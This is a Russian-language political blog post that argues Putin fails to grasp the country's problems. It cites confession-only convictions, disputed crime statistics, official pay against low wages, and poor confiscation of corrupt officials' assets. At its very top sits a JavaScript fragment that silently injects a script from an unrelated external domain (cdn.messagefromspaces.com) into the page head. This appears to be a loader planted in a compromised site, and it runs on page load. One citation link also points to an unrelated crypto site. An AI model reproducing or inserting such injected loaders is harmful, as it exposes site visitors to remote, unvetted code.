, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Этого Путин уже не понимает, что ведёт к большой беде

08 Апр

Более 10 лет пишу о том, что неправомерно осуждать подсудимых только на одних их признательных показаниях, не исследуя и не проверяя собранные по делу доказательства на  относимость, допустимость и достоверность, а также  на достаточность для вынесения обвинительного приговора.

Конституция России и ч. 2 статьи 77 УПК РФ, прямо запрещают такое осуждение.

Кроме того, не востребованность в работе дознавателей и следователей норм УПК РФ, регулирующих доказательства и доказывание, ведёт к утрате ими профессионализма.

Уже и Генеральный прокурор Юрий Чайка  не раз публично высказывался о том, что существующее упрощённое судопроизводство  ведёт к утрате знаний и навыков по доказательствам и доказыванию. Он утверждает: http://genproc.gov.ru/smi/interview_and_appearences/interview/547089/%20     «число допускаемых нарушений законодательства, в том числе конституционных прав граждан, не только не снижается, но и растет».

О низком качестве сбора и представления доказательств стороной обвинения, заговорила https://tocrypto.ru/news/olga-egorova-predsedatel-mosgorsuda-dala-intervyu/         и председатель Мосгорсуда Ольга Егорова.

Действительно, вода камень точит.

На расширенном http://kremlin.ru/events/president/news/60100   заседании коллегии Генеральной прокуратуры Российской Федерации уже и Путин призывает: «крайне ответственно относиться к согласию на рассмотрение в судах уголовных дел в особом порядке».

«Рассмотрение дел в особом порядке — важный, конечно, инструмент, но он не должен служить прикрытием некачественной, некомпетентной работы в сфере следствия».

Но это никак не сказывается сейчас  на правоприменительной практике. Вновь осудят без исследования доказательств сотни тысяч подсудимых.

На расширенном заседании коллегии МВД России Путин подводя http://kremlin.ru/events/president/news/59913   итоги работы Министерства внутренних дел России за прошлый год, среди положительных тенденций  отметил «сокращение общего количества преступлений».

Но то, что это не соответствует действительности, я  на протяжении десяти лет публично говорю об этом.

Словно помощники Путина не знают о проводимых исследованиях,  доказывающих, что  получают http://rapsinews.ru/judicial_analyst/20141202/272697983.html   защиту правоохранительных органов не более 10%, пострадавших от преступлений.

Словно Генеральный прокурор Юрий Чайка не говорил ничего о том, что не все пострадавшие от преступлений, получают статус потерпевший.  «Ежегодно прокуроры выявляют массу случаев, когда людям отказывают в приеме их заявлений о преступлениях при наличии бесспорных поводов и оснований для возбуждения уголовного дела. Отмененные прокурорами постановления об отказе в возбуждении уголовного дела исчисляются миллионами» — утверждает https://rg.ru/2015/01/12/chaika.html        Генеральный прокурор.

А среди этих миллионов неправомерных отказов, наверняка,  есть сотни тысяч сообщений о коррумпированных деяниях чиновников, о лицах, что  обобирают сотни тысяч предпринимателей.

Но Путин отказывается этому верить, и россиянам говорит о том, что не соответствует действительности.

Путина не смущает тот факт, что о «сокращении общего количества преступлений»  он  рассказывает не обывателям, а тем, кто достоверно знает, как она эта, преступность, «фактически» сокращается.

Ну и как будут работать правоохранители после таких заявлений гаранта Конституции?

Путин не замечает, что много уважаемых людей, став депутатами забыли о своих обещаниях избирателям и не стыдятся получать зарплаты, превышающие средние по стране в 10−20 раз.

Это при том, что, как отметила  вице-премьер Ольга Голодец, в России есть уникальное явление — работающие бедные.

«На уровне МРОТ работают 4 млн 900 тысяч человек. О какой производительности труда можно говорить, если за месяц работы человек получается такие деньги», — возмущалась https://www.gazeta.ru/business/2017/12/14/11466530.shtml    вице-премьер.

И мы ещё рассуждаем о причинах низкой производительности труда в России, восторгаясь данными о том, какой она в странах Европы и в США.

Но Путин считает, что мы не можем иностранным (подразумеваются иностранные топ менеджеры в наших государственных компаниях) платить одну цену, одну зарплату, а нашим другую.

Путин полагает https://www.kommersant.ru/amp/3151449   : «Сотрудники крупных компаний наших, конечно, получают очень солидные деньги. Но мы должны смотреть на их уровень заработной платы не по сравнению со средним заработком в стране даже, хотя должны это иметь в виду всегда, но смотреть, как их коллеги в таких же корпорациях в мире получают».

Вот и договорился Путин до абсурда.

Это, за какие  такие заслуги руководители госкорпораций и высшие чиновники должны получать денежное вознаграждение на уровне ведущих стран мира, а у остальных граждан страны заработная плата может быть ниже стандартов этих странах в разы?

Вот и получается, что не все россияне, а только назначенные Путиным, стали высшей и очень обеспеченной  ценностью.

А остальных россиян это Конституционное требование, к осуществляющим государственную власть, не касается?

Не смущает Путина и то, что при доказанности виновности Васильевой и Улюкаева, их имущество не было конфисковано.

Статья 290 УК РФ позволяла оштрафовать  Улюкаева в семидесятикратном размере взятки, но  его оштрафовали только в однократном размере, вернув  https://echo.msk.ru/blog/advokatvladimir/2371193-echo/   взяточнику почти миллиард имущества,  неизвестно каким путём заработанного.

А в это время, как утверждает https://lentachel.ru/news/2019/02/04/glavnyy-vrag-rossii-elita-strany-schitaet-yakov-kedmi.html?utm_referrer=https%3A%2F%2Fzen.yandex.com   Яков Кедми:    «В одном лишь Лондоне проживает около 200 тысяч семей российских чиновников, там каждый пятый особняк принадлежит гражданину России».

Да, иногда имущество вороватых чиновников обнаруживают и конфискуют.

Но вот, что говорит https://russian.rt.com/business/news/579128-rosimuschestvo-konfiskaciya-auditory?utm_source=yxnews&utm_medium=desktop    о конфисканте А. Кудрин.

«В 2017 году расходы на хранение составили 222 млн рублей, а доходы от реализации — 180 млн рублей».

«В первой половине текущего года Росимущество потратило на хранение конфиската 62 млн рублей при прибыли всего в 64 млн рублей.

На продажу направляется менее 1% изъятого имущества».

Это значит, что у Хорошавина изъяли имущества более, чем на млрд руб., а на реализацию ушёл только 1% изъятого имущества.

Очевидно, та же участь ждёт и конфискованное  https://www.kommersant.ru/doc/3937956?utm_source=yxnews&utm_medium=desktop  более чем на 10 млрд. руб. имущество Александра Шестуна.

Всё это доказывает неспособность Путина справляться с теми  проблемами, что накопились в стране.

Такое осуществление государственности Путиным привело к огромному искусственному и несправедливому разрыву  между доходами самых богатых и самых бедных граждан страны.

В таком состоянии Россия не была даже  в 1917 году, но Путин и его команда, получающая заработные платы не по сравнению со средним заработком в стране,  а  равные тем, что получают  их  коллеги в развитых экономических странах, этого уже не понимают.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.